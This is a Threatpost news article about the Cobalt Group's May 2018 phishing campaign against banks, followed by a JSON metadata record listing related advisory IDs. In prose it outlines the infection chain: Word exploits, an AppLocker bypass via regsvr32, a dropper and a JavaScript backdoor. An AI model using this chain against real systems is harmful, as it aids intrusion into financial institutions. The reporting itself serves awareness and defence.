Despite Ringleader’s Arrest, Cobalt Group Still Active

2018-05-28T12:21:42

Description

Evidence has surfaced that the Cobalt Group – the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe – is continuing to operate, despite the arrest of its accused ringleader in March. The Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries. In a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target’s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it’s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said. “Although [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group’s previous attacks,” they noted. Cobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs. The new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February. “Cobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,” explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers’ success rate jumps to 33 percent. As for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor. The resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group’s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.

{"id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it\u2019s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "published": "2018-05-28T12:21:42", "modified": "2018-05-28T12:21:42", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "reporter": "Tara Seals", "references": ["https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf", "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf", "https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/", "https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/"], "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "immutableFields": [], "lastseen": "2019-05-30T05:52:39", "viewCount": 62, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:01414FF4-26B2-4222-97E5-C5371A16E182", "AKB:2D05FC62-63F8-468A-A143-8C876A7F9789", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "canvas", "idList": ["OFFICE_WSDL"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0725", "CPAI-2017-1009", "CPAI-2018-0018"]}, {"type": "cisa", "idList": ["CISA:D70586B2C2D5D982D54DA686CCF0F4D1"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-11882", "CISA-KEV-CVE-2017-8570", "CISA-KEV-CVE-2018-0802"]}, {"type": "cve", "idList": ["CVE-2017-0243", "CVE-2017-11882", "CVE-2017-11884", "CVE-2017-8570", "CVE-2018-0802"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "hivepro", "idList": ["HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F"]}, {"type": "ics", "idList": ["AA20-133A", "AA20-266A", "AA21-209A", "AA22-117A"]}, {"type": "kaspersky", "idList": ["KLA11069", "KLA11139", "KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:3067D03AD5A4441FEBB702BADFD6C4A1", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:775442060A0795887FAB657C06773723"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2017-8570", "MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB3213545", "KB3213555", "KB3213624", "KB3213640", "KB4011262", "KB4011276", "KB4011574", "KB4011580", "KB4011604", "KB4011607", "KB4011610", "KB4011618", "KB4011643", "KB4011656", "KB4011659"]}, {"type": "mssecure", "idList": ["MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201890088", "MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_JUL_OFFICE.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811231", "OPENVAS:1361412562310811232", "OPENVAS:1361412562310811233", "OPENVAS:1361412562310811451", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812730", "OPENVAS:1361412562310812731"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-102347", "SMNTC-99445"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:7FDC117533451294884ABE03F31ED36B", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:125A440CBDB25270B696C1CCC246BEA1", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:5CEFBA9FAF414B3F57548EAB0EEA1718", "THN:6885760BEEB9A6CBDFB108443DDF540C", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:DADA9CB340C28F942D085928B22B103F", "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:FBCEC8F0CE0D3932FE4C315878C48403"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:14171FFFDCB402F0E392DA20B23E7B5A", "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "THREATPOST:14FF20625850B129B7F957E8393339F1", "THREATPOST:1663F2C868E9B0A3184989EAF71EB3DA", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:326CCB6EA4E28611AD98B1964CFEE88E", "THREATPOST:3283173A16F1E86892491D89F2E307C2", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:384A1D8040B61120BE2BA529493B9871", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3F2E82624DED93EDD273ABC41E24154C", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", 